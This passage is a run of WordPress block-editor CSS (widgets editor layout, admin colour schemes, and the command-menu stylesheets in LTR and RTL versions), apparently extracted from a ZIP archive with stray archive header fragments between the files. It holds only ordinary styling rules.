(min-width:782px){.interface-interface-skeleton__content{z-index:auto}}.interface-interface-skeleton__secondary-sidebar,.interface-interface-skeleton__sidebar{background:#fff;bottom:0;color:#1e1e1e;flex-shrink:0;position:absolute;right:0;top:0;width:auto;z-index:100000}@media (min-width:782px){.interface-interface-skeleton__secondary-sidebar,.interface-interface-skeleton__sidebar{position:relative!important}}.interface-interface-skeleton__sidebar{border-top:1px solid #e0e0e0;overflow:hidden}@media (min-width:782px){.interface-interface-skeleton__sidebar{box-shadow:1px 0 0 0 rgba(0,0,0,.133);outline:1px solid #0000}}.interface-interface-skeleton__secondary-sidebar{border-top:1px solid #e0e0e0;left:0}@media (min-width:782px){.interface-interface-skeleton__secondary-sidebar{box-shadow:-1px 0 0 0 rgba(0,0,0,.133);outline:1px solid #0000}}.interface-interface-skeleton__header{box-shadow:0 1px 0 0 rgba(0,0,0,.133);color:#1e1e1e;flex-shrink:0;height:auto;outline:1px solid #0000;z-index:30}.interface-interface-skeleton__footer{background-color:#fff;border-top:1px solid #e0e0e0;bottom:0;color:#1e1e1e;display:none;flex-shrink:0;height:auto;position:absolute;right:0;width:100%;z-index:90}@media (min-width:782px){.interface-interface-skeleton__footer{display:flex}}.interface-interface-skeleton__footer .block-editor-block-breadcrumb{align-items:center;background:#fff;display:flex;font-size:13px;height:24px;padding:0 18px;z-index:30}.interface-interface-skeleton__actions{background:#fff;bottom:auto;color:#1e1e1e;left:0;position:fixed!important;right:auto;top:-9999em;width:100vw;z-index:100000}@media (min-width:782px){.interface-interface-skeleton__actions{width:280px}}.interface-interface-skeleton__actions:focus,.interface-interface-skeleton__actions:focus-within{bottom:0;top:auto}.is-entity-save-view-open .interface-interface-skeleton__actions:focus,.is-entity-save-view-open .interface-interface-skeleton__actions:focus-within{top:46px}@media (min-width:782px){.is-entity-save-view-open .interface-interface-skeleton__actions:focus,.is-entity-save-view-open .interface-interface-skeleton__actions:focus-within{border-right:1px solid #ddd;top:32px}.is-fullscreen-mode .is-entity-save-view-open .interface-interface-skeleton__actions:focus,.is-fullscreen-mode .is-entity-save-view-open .interface-interface-skeleton__actions:focus-within{top:0}}.interface-pinned-items{display:flex}.interface-pinned-items .components-button{display:none;margin:0}.interface-pinned-items .components-button[aria-controls="edit-post:block"],.interface-pinned-items .components-button[aria-controls="edit-post:document"],.interface-pinned-items .components-button[aria-controls="edit-site:block-inspector"],.interface-pinned-items .components-button[aria-controls="edit-site:template"]{display:flex}.interface-pinned-items .components-button svg{max-height:24px;max-width:24px}@media (min-width:600px){.interface-pinned-items .components-button{display:flex}}.interface-pinned-items{gap:8px}.wp-block[data-type="core/widget-area"]{margin-left:auto;margin-right:auto;max-width:700px}.wp-block[data-type="core/widget-area"] .components-panel__body>.components-panel__body-title{background:#fff;font-family:-apple-system,BlinkMacSystemFont,Segoe UI,Roboto,Oxygen-Sans,Ubuntu,Cantarell,Helvetica Neue,sans-serif;height:48px;margin:0;position:relative;transform:translateZ(0);z-index:1}.wp-block[data-type="core/widget-area"] .components-panel__body>.components-panel__body-title:hover{background:#fff}.wp-block[data-type="core/widget-area"] .block-list-appender.wp-block{position:relative;width:auto}.wp-block[data-type="core/widget-area"] .editor-styles-wrapper .wp-block.wp-block.wp-block.wp-block.wp-block{max-width:100%}.wp-block[data-type="core/widget-area"] .components-panel__body.is-opened{padding:0}.blocks-widgets-container .wp-block-widget-area__inner-blocks.editor-styles-wrapper{margin:0;padding:0}.blocks-widgets-container .wp-block-widget-area__inner-blocks.editor-styles-wrapper>.block-editor-block-list__layout{margin-top:-48px;min-height:32px;padding:72px 16px 16px}.wp-block-widget-area__highlight-drop-zone{outline:var(--wp-admin-border-width-focus) solid var(--wp-admin-theme-color)}body.is-dragging-components-draggable .wp-block[data-type="core/widget-area"] .components-panel__body>.components-panel__body-title,body.is-dragging-components-draggable .wp-block[data-type="core/widget-area"] .components-panel__body>.components-panel__body-title *{pointer-events:none}.edit-widgets-error-boundary{box-shadow:0 5px 15px #00000014,0 15px 27px #00000012,0 30px 36px #0000000a,0 50px 43px #00000005;margin:64px auto auto;max-width:780px;padding:20px}.edit-widgets-header{align-items:center;background:#fff;display:flex;height:64px;justify-content:space-between;overflow:auto}@media (min-width:600px){.edit-widgets-header{overflow:visible}}.edit-widgets-header .selected-block-tools-wrapper{align-items:center;display:flex;height:64px;overflow:hidden}.edit-widgets-header .selected-block-tools-wrapper .block-editor-block-contextual-toolbar{border-bottom:0;height:100%}.edit-widgets-header .selected-block-tools-wrapper .block-editor-block-toolbar{height:100%;padding-top:17px}.edit-widgets-header .selected-block-tools-wrapper .block-editor-block-toolbar .components-button:not(.block-editor-block-mover-button){height:32px}.edit-widgets-header .selected-block-tools-wrapper .components-toolbar,.edit-widgets-header .selected-block-tools-wrapper .components-toolbar-group{border-left:none}.edit-widgets-header .selected-block-tools-wrapper .components-toolbar-group:after,.edit-widgets-header .selected-block-tools-wrapper .components-toolbar:after{background-color:#ddd;content:"";height:24px;margin-right:8px;margin-top:4px;width:1px}.edit-widgets-header .selected-block-tools-wrapper .components-toolbar .components-toolbar-group.components-toolbar-group:after,.edit-widgets-header .selected-block-tools-wrapper .components-toolbar-group .components-toolbar-group.components-toolbar-group:after{display:none}.edit-widgets-header .selected-block-tools-wrapper .block-editor-block-mover.is-horizontal .block-editor-block-mover-button{height:32px;overflow:visible}@media (min-width:600px){.edit-widgets-header .selected-block-tools-wrapper .block-editor-block-mover:not(.is-horizontal) .block-editor-block-mover__move-button-container{position:relative;top:-10px}}.edit-widgets-header__navigable-toolbar-wrapper{align-items:center;display:flex;flex-shrink:2;height:64px;justify-content:center;overflow:hidden;padding-left:8px;padding-right:16px}.edit-widgets-header__title{font-size:20px;margin:0 0 0 20px;padding:0}.edit-widgets-header__actions{align-items:center;display:flex;padding-left:4px}@media (min-width:600px){.edit-widgets-header__actions{padding-left:8px}}.edit-widgets-header__actions{gap:8px}.edit-widgets-header-toolbar{gap:8px;margin-left:8px}.edit-widgets-header-toolbar>.components-button.has-icon.has-icon.has-icon,.edit-widgets-header-toolbar>.components-dropdown>.components-button.has-icon.has-icon{height:32px;min-width:32px;padding:4px}.edit-widgets-header-toolbar>.components-button.has-icon.has-icon.has-icon.is-pressed,.edit-widgets-header-toolbar>.components-dropdown>.components-button.has-icon.has-icon.is-pressed{background:#1e1e1e}.edit-widgets-header-toolbar>.components-button.has-icon.has-icon.has-icon:focus:not(:disabled),.edit-widgets-header-toolbar>.components-dropdown>.components-button.has-icon.has-icon:focus:not(:disabled){box-shadow:0 0 0 var(--wp-admin-border-width-focus) var(--wp-admin-theme-color),inset 0 0 0 1px #fff;outline:1px solid #0000}.edit-widgets-header-toolbar>.components-button.has-icon.has-icon.has-icon:before,.edit-widgets-header-toolbar>.components-dropdown>.components-button.has-icon.has-icon:before{display:none}.edit-widgets-header-toolbar__inserter-toggle.edit-widgets-header-toolbar__inserter-toggle{padding-left:8px;padding-right:8px}@media (min-width:600px){.edit-widgets-header-toolbar__inserter-toggle.edit-widgets-header-toolbar__inserter-toggle{padding-left:12px;padding-right:12px}}.edit-widgets-header-toolbar__inserter-toggle.edit-widgets-header-toolbar__inserter-toggle:after{content:none}@media not (prefers-reduced-motion){.edit-widgets-header-toolbar__inserter-toggle.edit-widgets-header-toolbar__inserter-toggle svg{transition:transform .2s cubic-bezier(.165,.84,.44,1)}}.edit-widgets-header-toolbar__inserter-toggle.edit-widgets-header-toolbar__inserter-toggle.is-pressed svg{transform:rotate(-45deg)}.edit-widgets-keyboard-shortcut-help-modal__section{margin:0 0 2rem}.edit-widgets-keyboard-shortcut-help-modal__section-title{font-size:.9rem;font-weight:600}.edit-widgets-keyboard-shortcut-help-modal__shortcut{align-items:baseline;border-top:1px solid #ddd;display:flex;margin-bottom:0;padding:.6rem 0}.edit-widgets-keyboard-shortcut-help-modal__shortcut:last-child{border-bottom:1px solid #ddd}.edit-widgets-keyboard-shortcut-help-modal__shortcut:empty{display:none}.edit-widgets-keyboard-shortcut-help-modal__shortcut-term{font-weight:600;margin:0 1rem 0 0;text-align:left}.edit-widgets-keyboard-shortcut-help-modal__shortcut-description{flex:1;margin:0}.edit-widgets-keyboard-shortcut-help-modal__shortcut-key-combination{background:none;display:block;margin:0;padding:0}.edit-widgets-keyboard-shortcut-help-modal__shortcut-key-combination+.edit-widgets-keyboard-shortcut-help-modal__shortcut-key-combination{margin-top:10px}.edit-widgets-keyboard-shortcut-help-modal__shortcut-key{border-radius:8%;margin:0 .2rem;padding:.25rem .5rem}.edit-widgets-keyboard-shortcut-help-modal__shortcut-key:last-child{margin:0 .2rem 0 0}.components-panel__header.edit-widgets-sidebar__panel-tabs{padding-right:0}.edit-widgets-widget-areas__top-container{display:flex;padding:16px}.edit-widgets-widget-areas__top-container .block-editor-block-icon{margin-left:16px}.edit-widgets-notices__snackbar{bottom:20px;left:0;padding-left:16px;padding-right:16px;position:fixed;right:0}@media (min-width:783px){.edit-widgets-notices__snackbar{right:160px}}@media (min-width:783px){.auto-fold .edit-widgets-notices__snackbar{right:36px}}@media (min-width:961px){.auto-fold .edit-widgets-notices__snackbar{right:160px}}.folded .edit-widgets-notices__snackbar{right:0}@media (min-width:783px){.folded .edit-widgets-notices__snackbar{right:36px}}body.is-fullscreen-mode .edit-widgets-notices__snackbar{right:0!important}.edit-widgets-notices__dismissible .components-notice,.edit-widgets-notices__pinned .components-notice{border-bottom:1px solid #0003;box-sizing:border-box;min-height:64px;padding:0 12px}.edit-widgets-notices__dismissible .components-notice .components-notice__dismiss,.edit-widgets-notices__pinned .components-notice .components-notice__dismiss{margin-top:12px}.edit-widgets-layout__inserter-panel{display:flex;flex-direction:column;height:100%}.edit-widgets-layout__inserter-panel .block-editor-inserter__menu{overflow:hidden}.edit-widgets-layout__inserter-panel-content{height:calc(100% - 44px)}.edit-widgets-layout__inserter-panel-content .block-editor-inserter__tablist-and-close{display:none}@media (min-width:782px){.edit-widgets-layout__inserter-panel-content{height:100%}}.components-popover.more-menu-dropdown__content{z-index:99998}.edit-widgets-welcome-guide{width:312px}.edit-widgets-welcome-guide__image{background:#00a0d2;margin:0 0 16px}.edit-widgets-welcome-guide__image>img{display:block;max-width:100%;object-fit:cover}.edit-widgets-welcome-guide__heading{font-family:-apple-system,BlinkMacSystemFont,Segoe UI,Roboto,Oxygen-Sans,Ubuntu,Cantarell,Helvetica Neue,sans-serif;font-size:24px;line-height:1.4;margin:16px 0;padding:0 32px}.edit-widgets-welcome-guide__text{font-size:13px;line-height:1.4;margin:0 0 24px;padding:0 32px}.edit-widgets-welcome-guide__inserter-icon{margin:0 4px;vertical-align:text-top}.edit-widgets-block-editor{font-family:-apple-system,BlinkMacSystemFont,Segoe UI,Roboto,Oxygen-Sans,Ubuntu,Cantarell,Helvetica Neue,sans-serif;position:relative}.edit-widgets-block-editor,.edit-widgets-block-editor .block-editor-writing-flow,.edit-widgets-block-editor>div:last-of-type{display:flex;flex-direction:column;flex-grow:1}.edit-widgets-block-editor .edit-widgets-main-block-list{height:100%}.edit-widgets-block-editor .components-button{font-family:-apple-system,BlinkMacSystemFont,Segoe UI,Roboto,Oxygen-Sans,Ubuntu,Cantarell,Helvetica Neue,sans-serif;font-size:13px}.edit-widgets-block-editor .components-button.has-icon,.edit-widgets-block-editor .components-button.is-tertiary{padding:6px}.edit-widgets-editor__list-view-panel{display:flex;flex-direction:column;height:100%;min-width:350px}.edit-widgets-editor__list-view-panel-content{height:calc(100% - 44px);overflow-y:auto;padding:8px}.edit-widgets-editor__list-view-panel-header{align-items:center;border-bottom:1px solid #ddd;display:flex;height:48px;justify-content:space-between;padding-left:8px;padding-right:16px}body.js.appearance_page_gutenberg-widgets,body.js.widgets-php{background:#fff}body.js.appearance_page_gutenberg-widgets #wpcontent,body.js.widgets-php #wpcontent{padding-right:0}body.js.appearance_page_gutenberg-widgets #wpbody-content,body.js.widgets-php #wpbody-content{padding-bottom:0}body.js.appearance_page_gutenberg-widgets #wpbody-content>div:not(.blocks-widgets-container):not(#screen-meta),body.js.appearance_page_gutenberg-widgets #wpfooter,body.js.widgets-php #wpbody-content>div:not(.blocks-widgets-container):not(#screen-meta),body.js.widgets-php #wpfooter{display:none}body.js.appearance_page_gutenberg-widgets .a11y-speak-region,body.js.widgets-php .a11y-speak-region{right:-1px;top:-1px}body.js.appearance_page_gutenberg-widgets ul#adminmenu a.wp-has-current-submenu:after,body.js.appearance_page_gutenberg-widgets ul#adminmenu>li.current>a.current:after,body.js.widgets-php ul#adminmenu a.wp-has-current-submenu:after,body.js.widgets-php ul#adminmenu>li.current>a.current:after{border-left-color:#fff}body.js.appearance_page_gutenberg-widgets .media-frame select.attachment-filters:last-of-type,body.js.widgets-php .media-frame select.attachment-filters:last-of-type{max-width:100%;width:auto}.blocks-widgets-container{box-sizing:border-box}.blocks-widgets-container *,.blocks-widgets-container :after,.blocks-widgets-container :before{box-sizing:inherit}@media (min-width:600px){.blocks-widgets-container{bottom:0;left:0;min-height:calc(100vh - 46px);position:absolute;right:0;top:0}}@media (min-width:782px){.blocks-widgets-container{min-height:calc(100vh - 32px)}}.blocks-widgets-container .interface-interface-skeleton__content{background-color:#f0f0f0}.blocks-widgets-container .editor-styles-wrapper{margin:auto;max-width:700px}.edit-widgets-sidebar .components-button.interface-complementary-area__pin-unpin-item{display:none}.js .widgets-php .notice{display:none!important}body.admin-color-light{--wp-admin-theme-color:#0085ba;--wp-admin-theme-color--rgb:0,133,186;--wp-admin-theme-color-darker-10:#0073a1;--wp-admin-theme-color-darker-10--rgb:0,114.7661290323,160.5;--wp-admin-theme-color-darker-20:#006187;--wp-admin-theme-color-darker-20--rgb:0,96.5322580645,135;--wp-admin-border-width-focus:2px}@media (min-resolution:192dpi){body.admin-color-light{--wp-admin-border-width-focus:1.5px}}body.admin-color-modern{--wp-admin-theme-color:#3858e9;--wp-admin-theme-color--rgb:56,88,233;--wp-admin-theme-color-darker-10:#2145e6;--wp-admin-theme-color-darker-10--rgb:33.0384615385,68.7307692308,230.4615384615;--wp-admin-theme-color-darker-20:#183ad6;--wp-admin-theme-color-darker-20--rgb:23.6923076923,58.1538461538,214.3076923077;--wp-admin-border-width-focus:2px}@media (min-resolution:192dpi){body.admin-color-modern{--wp-admin-border-width-focus:1.5px}}body.admin-color-blue{--wp-admin-theme-color:#096484;--wp-admin-theme-color--rgb:9,100,132;--wp-admin-theme-color-darker-10:#07526c;--wp-admin-theme-color-darker-10--rgb:7.3723404255,81.914893617,108.1276595745;--wp-admin-theme-color-darker-20:#064054;--wp-admin-theme-color-darker-20--rgb:5.7446808511,63.829787234,84.2553191489;--wp-admin-border-width-focus:2px}@media (min-resolution:192dpi){body.admin-color-blue{--wp-admin-border-width-focus:1.5px}}body.admin-color-coffee{--wp-admin-theme-color:#46403c;--wp-admin-theme-color--rgb:70,64,60;--wp-admin-theme-color-darker-10:#383330;--wp-admin-theme-color-darker-10--rgb:56.2692307692,51.4461538462,48.2307692308;--wp-admin-theme-color-darker-20:#2b2724;--wp-admin-theme-color-darker-20--rgb:42.5384615385,38.8923076923,36.4615384615;--wp-admin-border-width-focus:2px}@media (min-resolution:192dpi){body.admin-color-coffee{--wp-admin-border-width-focus:1.5px}}body.admin-color-ectoplasm{--wp-admin-theme-color:#523f6d;--wp-admin-theme-color--rgb:82,63,109;--wp-admin-theme-color-darker-10:#46365d;--wp-admin-theme-color-darker-10--rgb:69.8430232558,53.6598837209,92.8401162791;--wp-admin-theme-color-darker-20:#3a2c4d;--wp-admin-theme-color-darker-20--rgb:57.6860465116,44.3197674419,76.6802325581;--wp-admin-border-width-focus:2px}@media (min-resolution:192dpi){body.admin-color-ectoplasm{--wp-admin-border-width-focus:1.5px}}body.admin-color-midnight{--wp-admin-theme-color:#e14d43;--wp-admin-theme-color--rgb:225,77,67;--wp-admin-theme-color-darker-10:#dd382d;--wp-admin-theme-color-darker-10--rgb:221.4908256881,56.1788990826,45.0091743119;--wp-admin-theme-color-darker-20:#d02c21;--wp-admin-theme-color-darker-20--rgb:207.8348623853,44.2201834862,33.1651376147;--wp-admin-border-width-focus:2px}@media (min-resolution:192dpi){body.admin-color-midnight{--wp-admin-border-width-focus:1.5px}}body.admin-color-ocean{--wp-admin-theme-color:#627c83;--wp-admin-theme-color--rgb:98,124,131;--wp-admin-theme-color-darker-10:#576e74;--wp-admin-theme-color-darker-10--rgb:87.0873362445,110.192139738,116.4126637555;--wp-admin-theme-color-darker-20:#4c6066;--wp-admin-theme-color-darker-20--rgb:76.1746724891,96.384279476,101.8253275109;--wp-admin-border-width-focus:2px}@media (min-resolution:192dpi){body.admin-color-ocean{--wp-admin-border-width-focus:1.5px}}body.admin-color-sunrise{--wp-admin-theme-color:#dd823b;--wp-admin-theme-color--rgb:221,130,59;--wp-admin-theme-color-darker-10:#d97426;--wp-admin-theme-color-darker-10--rgb:216.8782608696,116.1847826087,37.6217391304;--wp-admin-theme-color-darker-20:#c36922;--wp-admin-theme-color-darker-20--rgb:195.147826087,104.5434782609,33.852173913;--wp-admin-border-width-focus:2px}@media (min-resolution:192dpi){body.admin-color-sunrise{--wp-admin-border-width-focus:1.5px}}PK!Awdist/commands/style.cssnuȯ:root{ --wp-block-synced-color:#7a00df; --wp-block-synced-color--rgb:122, 0, 223; --wp-bound-block-color:var(--wp-block-synced-color); --wp-editor-canvas-background:#ddd; --wp-admin-theme-color:#007cba; --wp-admin-theme-color--rgb:0, 124, 186; --wp-admin-theme-color-darker-10:#006ba1; --wp-admin-theme-color-darker-10--rgb:0, 107, 160.5; --wp-admin-theme-color-darker-20:#005a87; --wp-admin-theme-color-darker-20--rgb:0, 90, 135; --wp-admin-border-width-focus:2px; } @media (min-resolution:192dpi){ :root{ --wp-admin-border-width-focus:1.5px; } } .commands-command-menu{ border-radius:4px; margin:auto; max-width:400px; position:relative; top:calc(5% + 64px); width:calc(100% - 32px); } @media (min-width:600px){ .commands-command-menu{ top:calc(10% + 64px); } } .commands-command-menu .components-modal__content{ margin:0; padding:0; } .commands-command-menu__overlay{ align-items:start; display:block; } .commands-command-menu__header{ align-items:center; display:flex; padding:0 16px; } .commands-command-menu__header .components-button{ border:1px solid #949494; border-radius:2px 0 0 2px; border-right:0; height:56px; justify-content:center; width:56px; } .commands-command-menu__header .components-button+[cmdk-input]{ border-bottom-left-radius:0; border-top-left-radius:0; } .commands-command-menu__header-search-icon:dir(ltr){ transform:scaleX(-1); } .commands-command-menu__container{ will-change:transform; } .commands-command-menu__container [cmdk-input]{ border:none; border-radius:0; color:#1e1e1e; font-size:15px; line-height:28px; margin:0; outline:none; padding:16px 4px; width:100%; } .commands-command-menu__container [cmdk-input]::placeholder{ color:#757575; } .commands-command-menu__container [cmdk-input]:focus{ box-shadow:none; outline:none; } .commands-command-menu__container [cmdk-item]{ align-items:center; border-radius:2px; color:#1e1e1e; cursor:pointer; display:flex; font-size:13px; } .commands-command-menu__container [cmdk-item]:active,.commands-command-menu__container [cmdk-item][aria-selected=true]{ background:var(--wp-admin-theme-color); color:#fff; } .commands-command-menu__container [cmdk-item]:active svg,.commands-command-menu__container [cmdk-item][aria-selected=true] svg{ fill:#fff; } .commands-command-menu__container [cmdk-item][aria-disabled=true]{ color:#949494; cursor:not-allowed; } .commands-command-menu__container [cmdk-item] svg{ fill:#1e1e1e; } .commands-command-menu__container [cmdk-item]>div{ min-height:40px; padding:4px 4px 4px 40px; } .commands-command-menu__container [cmdk-item]>.has-icon{ padding-left:8px; } .commands-command-menu__container [cmdk-root]>[cmdk-list]{ max-height:368px; overflow:auto; } .commands-command-menu__container [cmdk-root]>[cmdk-list] [cmdk-list-sizer]>[cmdk-group]:last-child [cmdk-group-items]:not(:empty){ padding-bottom:8px; } .commands-command-menu__container [cmdk-root]>[cmdk-list] [cmdk-list-sizer]>[cmdk-group]>[cmdk-group-items]:not(:empty){ padding:0 8px; } .commands-command-menu__container [cmdk-empty]{ align-items:center; color:#1e1e1e; display:flex; justify-content:center; padding:8px 0 32px; white-space:pre-wrap; } .commands-command-menu__container [cmdk-loading]{ padding:16px; } .commands-command-menu__container [cmdk-list-sizer]{ position:relative; } .commands-command-menu__item span{ display:inline-block; overflow:hidden; text-overflow:ellipsis; white-space:nowrap; } .commands-command-menu__item mark{ background:unset; color:inherit; font-weight:600; } body.admin-color-light{ --wp-admin-theme-color:#0085ba; --wp-admin-theme-color--rgb:0, 133, 186; --wp-admin-theme-color-darker-10:#0073a1; --wp-admin-theme-color-darker-10--rgb:0, 114.7661290323, 160.5; --wp-admin-theme-color-darker-20:#006187; --wp-admin-theme-color-darker-20--rgb:0, 96.5322580645, 135; --wp-admin-border-width-focus:2px; } @media (min-resolution:192dpi){ body.admin-color-light{ --wp-admin-border-width-focus:1.5px; } } body.admin-color-modern{ --wp-admin-theme-color:#3858e9; --wp-admin-theme-color--rgb:56, 88, 233; --wp-admin-theme-color-darker-10:#2145e6; --wp-admin-theme-color-darker-10--rgb:33.0384615385, 68.7307692308, 230.4615384615; --wp-admin-theme-color-darker-20:#183ad6; --wp-admin-theme-color-darker-20--rgb:23.6923076923, 58.1538461538, 214.3076923077; --wp-admin-border-width-focus:2px; } @media (min-resolution:192dpi){ body.admin-color-modern{ --wp-admin-border-width-focus:1.5px; } } body.admin-color-blue{ --wp-admin-theme-color:#096484; --wp-admin-theme-color--rgb:9, 100, 132; --wp-admin-theme-color-darker-10:#07526c; --wp-admin-theme-color-darker-10--rgb:7.3723404255, 81.914893617, 108.1276595745; --wp-admin-theme-color-darker-20:#064054; --wp-admin-theme-color-darker-20--rgb:5.7446808511, 63.829787234, 84.2553191489; --wp-admin-border-width-focus:2px; } @media (min-resolution:192dpi){ body.admin-color-blue{ --wp-admin-border-width-focus:1.5px; } } body.admin-color-coffee{ --wp-admin-theme-color:#46403c; --wp-admin-theme-color--rgb:70, 64, 60; --wp-admin-theme-color-darker-10:#383330; --wp-admin-theme-color-darker-10--rgb:56.2692307692, 51.4461538462, 48.2307692308; --wp-admin-theme-color-darker-20:#2b2724; --wp-admin-theme-color-darker-20--rgb:42.5384615385, 38.8923076923, 36.4615384615; --wp-admin-border-width-focus:2px; } @media (min-resolution:192dpi){ body.admin-color-coffee{ --wp-admin-border-width-focus:1.5px; } } body.admin-color-ectoplasm{ --wp-admin-theme-color:#523f6d; --wp-admin-theme-color--rgb:82, 63, 109; --wp-admin-theme-color-darker-10:#46365d; --wp-admin-theme-color-darker-10--rgb:69.8430232558, 53.6598837209, 92.8401162791; --wp-admin-theme-color-darker-20:#3a2c4d; --wp-admin-theme-color-darker-20--rgb:57.6860465116, 44.3197674419, 76.6802325581; --wp-admin-border-width-focus:2px; } @media (min-resolution:192dpi){ body.admin-color-ectoplasm{ --wp-admin-border-width-focus:1.5px; } } body.admin-color-midnight{ --wp-admin-theme-color:#e14d43; --wp-admin-theme-color--rgb:225, 77, 67; --wp-admin-theme-color-darker-10:#dd382d; --wp-admin-theme-color-darker-10--rgb:221.4908256881, 56.1788990826, 45.0091743119; --wp-admin-theme-color-darker-20:#d02c21; --wp-admin-theme-color-darker-20--rgb:207.8348623853, 44.2201834862, 33.1651376147; --wp-admin-border-width-focus:2px; } @media (min-resolution:192dpi){ body.admin-color-midnight{ --wp-admin-border-width-focus:1.5px; } } body.admin-color-ocean{ --wp-admin-theme-color:#627c83; --wp-admin-theme-color--rgb:98, 124, 131; --wp-admin-theme-color-darker-10:#576e74; --wp-admin-theme-color-darker-10--rgb:87.0873362445, 110.192139738, 116.4126637555; --wp-admin-theme-color-darker-20:#4c6066; --wp-admin-theme-color-darker-20--rgb:76.1746724891, 96.384279476, 101.8253275109; --wp-admin-border-width-focus:2px; } @media (min-resolution:192dpi){ body.admin-color-ocean{ --wp-admin-border-width-focus:1.5px; } } body.admin-color-sunrise{ --wp-admin-theme-color:#dd823b; --wp-admin-theme-color--rgb:221, 130, 59; --wp-admin-theme-color-darker-10:#d97426; --wp-admin-theme-color-darker-10--rgb:216.8782608696, 116.1847826087, 37.6217391304; --wp-admin-theme-color-darker-20:#c36922; --wp-admin-theme-color-darker-20--rgb:195.147826087, 104.5434782609, 33.852173913; --wp-admin-border-width-focus:2px; } @media (min-resolution:192dpi){ body.admin-color-sunrise{ --wp-admin-border-width-focus:1.5px; } }PK!+4dist/commands/style-rtl.cssnuȯ:root{ --wp-block-synced-color:#7a00df; --wp-block-synced-color--rgb:122, 0, 223; --wp-bound-block-color:var(--wp-block-synced-color); --wp-editor-canvas-background:#ddd; --wp-admin-theme-color:#007cba; --wp-admin-theme-color--rgb:0, 124, 186; --wp-admin-theme-color-darker-10:#006ba1; --wp-admin-theme-color-darker-10--rgb:0, 107, 160.5; --wp-admin-theme-color-darker-20:#005a87; --wp-admin-theme-color-darker-20--rgb:0, 90, 135; --wp-admin-border-width-focus:2px; } @media (min-resolution:192dpi){ :root{ --wp-admin-border-width-focus:1.5px; } } .commands-command-menu{ border-radius:4px; margin:auto; max-width:400px; position:relative; top:calc(5% + 64px); width:calc(100% - 32px); } @media (min-width:600px){ .commands-command-menu{ top:calc(10% + 64px); } } .commands-command-menu .components-modal__content{ margin:0; padding:0; } .commands-command-menu__overlay{ align-items:start; display:block; } .commands-command-menu__header{ align-items:center; display:flex; padding:0 16px; } .commands-command-menu__header .components-button{ border:1px solid #949494; border-left:0; border-radius:0 2px 2px 0; height:56px; justify-content:center; width:56px; } .commands-command-menu__header .components-button+[cmdk-input]{ border-bottom-right-radius:0; border-top-right-radius:0; } .commands-command-menu__header-search-icon:dir(ltr){ transform:scaleX(-1); } .commands-command-menu__container{ will-change:transform; } .commands-command-menu__container [cmdk-input]{ border:none; border-radius:0; color:#1e1e1e; font-size:15px; line-height:28px; margin:0; outline:none; padding:16px 4px; width:100%; } .commands-command-menu__container [cmdk-input]::placeholder{ color:#757575; } .commands-command-menu__container [cmdk-input]:focus{ box-shadow:none; outline:none; } .commands-command-menu__container [cmdk-item]{ align-items:center; border-radius:2px; color:#1e1e1e; cursor:pointer; display:flex; font-size:13px; } .commands-command-menu__container [cmdk-item]:active,.commands-command-menu__container [cmdk-item][aria-selected=true]{ background:var(--wp-admin-theme-color); color:#fff; } .commands-command-menu__container [cmdk-item]:active svg,.commands-command-menu__container [cmdk-item][aria-selected=true] svg{ fill:#fff; } .commands-command-menu__container [cmdk-item][aria-disabled=true]{ color:#949494; cursor:not-allowed; } .commands-command-menu__container [cmdk-item] svg{ fill:#1e1e1e; } .commands-command-menu__container [cmdk-item]>div{ min-height:40px; padding:4px 40px 4px 4px; } .commands-command-menu__container [cmdk-item]>.has-icon{ padding-right:8px; } .commands-command-menu__container [cmdk-root]>[cmdk-list]{ max-height:368px; overflow:auto; } .commands-command-menu__container [cmdk-root]>[cmdk-list] [cmdk-list-sizer]>[cmdk-group]:last-child [cmdk-group-items]:not(:empty){ padding-bottom:8px; } .commands-command-menu__container [cmdk-root]>[cmdk-list] [cmdk-list-sizer]>[cmdk-group]>[cmdk-group-items]:not(:empty){ padding:0 8px; } .commands-command-menu__container [cmdk-empty]{ align-items:center; color:#1e1e1e; display:flex; justify-content:center; padding:8px 0 32px; white-space:pre-wrap; } .commands-command-menu__container [cmdk-loading]{ padding:16px; } .commands-command-menu__container [cmdk-list-sizer]{ position:relative; } .commands-command-menu__item span{ display:inline-block; overflow:hidden; text-overflow:ellipsis; white-space:nowrap; } .commands-command-menu__item mark{ background:unset; color:inherit; font-weight:600; } body.admin-color-light{ --wp-admin-theme-color:#0085ba; --wp-admin-theme-color--rgb:0, 133, 186; --wp-admin-theme-color-darker-10:#0073a1; --wp-admin-theme-color-darker-10--rgb:0, 114.7661290323, 160.5; --wp-admin-theme-color-darker-20:#006187; --wp-admin-theme-color-darker-20--rgb:0, 96.5322580645, 135; --wp-admin-border-width-focus:2px; } @media (min-resolution:192dpi){ body.admin-color-light{ --wp-admin-border-width-focus:1.5px; } } body.admin-color-modern{ --wp-admin-theme-color:#3858e9; --wp-admin-theme-color--rgb:56, 88, 233; --wp-admin-theme-color-darker-10:#2145e6; --wp-admin-theme-color-darker-10--rgb:33.0384615385, 68.7307692308, 230.4615384615; --wp-admin-theme-color-darker-20:#183ad6; --wp-admin-theme-color-darker-20--rgb:23.6923076923, 58.1538461538, 214.3076923077; --wp-admin-border-width-focus:2px; } @media (min-resolution:192dpi){ body.admin-color-modern{ --wp-admin-border-width-focus:1.5px; } } body.admin-color-blue{ --wp-admin-theme-color:#096484; --wp-admin-theme-color--rgb:9, 100, 132; --wp-admin-theme-color-darker-10:#07526c; --wp-admin-theme-color-darker-10--rgb:7.3723404255, 81.914893617, 108.1276595745; --wp-admin-theme-color-darker-20:#064054; --wp-admin-theme-color-darker-20--rgb:5.7446808511, 63.829787234, 84.2553191489; --wp-admin-border-width-focus:2px; } @media (min-resolution:192dpi){ body.admin-color-blue{ --wp-admin-border-width-focus:1.5px; } } body.admin-color-coffee{ --wp-admin-theme-color:#46403c; --wp-admin-theme-color--rgb:70, 64, 60; --wp-admin-theme-color-darker-10:#383330; --wp-admin-theme-color-darker-10--rgb:56.2692307692, 51.4461538462, 48.2307692308; --wp-admin-theme-color-darker-20:#2b2724; --wp-admin-theme-color-darker-20--rgb:42.5384615385, 38.8923076923, 36.4615384615; --wp-admin-border-width-focus:2px; } @media (min-resolution:192dpi){ body.admin-color-coffee{ --wp-admin-border-width-focus:1.5px; } } body.admin-color-ectoplasm{ --wp-admin-theme-color:#523f6d; --wp-admin-theme-color--rgb:82, 63, 109; --wp-admin-theme-color-darker-10:#46365d; --wp-admin-theme-color-darker-10--rgb:69.8430232558, 53.6598837209, 92.8401162791; --wp-admin-theme-color-darker-20:#3a2c4d; --wp-admin-theme-color-darker-20--rgb:57.6860465116, 44.3197674419, 76.6802325581; --wp-admin-border-width-focus:2px; } @media 